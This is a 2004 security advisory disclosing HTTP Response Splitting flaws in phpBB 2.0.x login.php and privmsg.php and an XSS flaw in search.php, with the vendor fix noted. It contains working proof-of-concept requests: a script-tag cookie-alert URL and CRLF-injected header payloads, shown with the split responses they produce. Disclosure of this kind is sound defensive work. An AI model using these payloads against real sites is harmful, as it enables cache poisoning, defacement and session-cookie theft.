///////////////////////////////////////////////////////////////////// //===================>> Security Advisory <<=======================// /////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------- ---[ PhpBB HTTP Response Splitting & Cross Site Scripting vuln. ---------------------------------------------------------------------
--[ Author: Ory Segal , Sanctum inc. http://www.SanctumInc.com --[ Discovery Date: 14/7/2004 --[ Release Date: 18/7/2004 --[ Product: PhpBB 2.0.x (was tested on 2.0.4, 2.0.9) --[ Severity: High
--[ HTTP Response Splitting details
Two scripts are vulnerable to HTTP Response Splitting attacks:
- /phpBB2/privmsg.php ('mode' parameter)
- /phpBB2/login.php ('redirect' parameter)These vulnerabilities may allow an attacker to perform various attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and perform cross-site scripting attacks.
--[ Cross Site Scripting details
When gpc magic quotes are turned off in php.ini, the script '/phpBB2/search.php' is vulnerable to XSS in the 'search_author' parameter. This vulnerability may lead to theft of cookies associated with the domain, or execution of client-side scripts in the user's browser.
--[ Additional information
Detailed information on HTTP Response Splitting can be found in the white paper "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" (Written by Amit Klein of Sanctum inc.)
http://www.sanctuminc.com/pdf/WhitePaper_HTTPResponse.pdf
Note [1]: The HTTP Response Splitting vulnerabilities do not require the user to be logged in to the application.
Note [2]: These vulnerabilities were discovered on PhpBB 2.0.9, installed on Win2K server with IIS/5.0, and PHP/4.3.4 (was also validated on PHP/4.3.8)
Note [3]: In theory these HTTP Response Splitting vulnerabilities should work on Microsoft web servers, WebSTAR and Xitami.
--[ Exploit Requests / URLs
-[ XSS Example
The following request will present a pop-up window containing the current session's cookies: (REQUEST IS WORD-WRAPPED!)
http://SERVER/phpBB2/search.php?search_author='<script>alert(document .cookie)</script>
-[ HTTP Response Splitting Example [1]
The following request will cause the application to return a split response (REQUEST and RESPONSE ARE WORD-WRAPPED!)
[REQUEST]
POST /phpBB2/login.php HTTP/1.0 Host: SERVER User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-Type: application/x-www-form-urlencoded Content-length: 129
logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!
[RESPONSE]
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 09:48:04 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 09:48:04 GMT; path=/ Set-Cookie: phpbb2mysql_sid=b389d63f8226cc6c8ad349b3aadf41f3; path=/ Refresh: 0; URL=http://SERVER/phpBB2foobar Content-Length: 0
HTTP/1.0 200 OK Content-Length: 7
Gotcha! ... ... ...
-[ HTTP Response Splitting Example [2]
The following request will cause the application to return a split response (REQUEST and RESPONSE ARE WORD-WRAPPED!)
[REQUEST]
GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d %0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! HTTP/1.0 Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.7 [en] (WinNT; I) Host: SERVER
[RESPONSE]
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 12:42:17 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 12:42:17 GMT; path=/ Set-Cookie: phpbb2mysql_sid=74d20cacbfcd9d7b16e0bb86a345aea3; path=/ Refresh: 0; URL=http://SERVER/phpBB2login.php?redirect=privmsg .php&folder=inbox&mode=foobar Content-Length: 0
HTTP/1.0 200 OK Content-Length: 7
Gotcha!&sid=74d20cacbfcd9d7b16e0bb86a345aea3 ... ... ... --[ Solution
According to the vendor, these issues are addressed in PhpBB 2.0.10
--[ Acknowledgements
Amit Klein, for helping with the research of the HTTP Response Splitting vulnerabilities in PhpBB (and for discovering HTTP Response Splitting in the first place
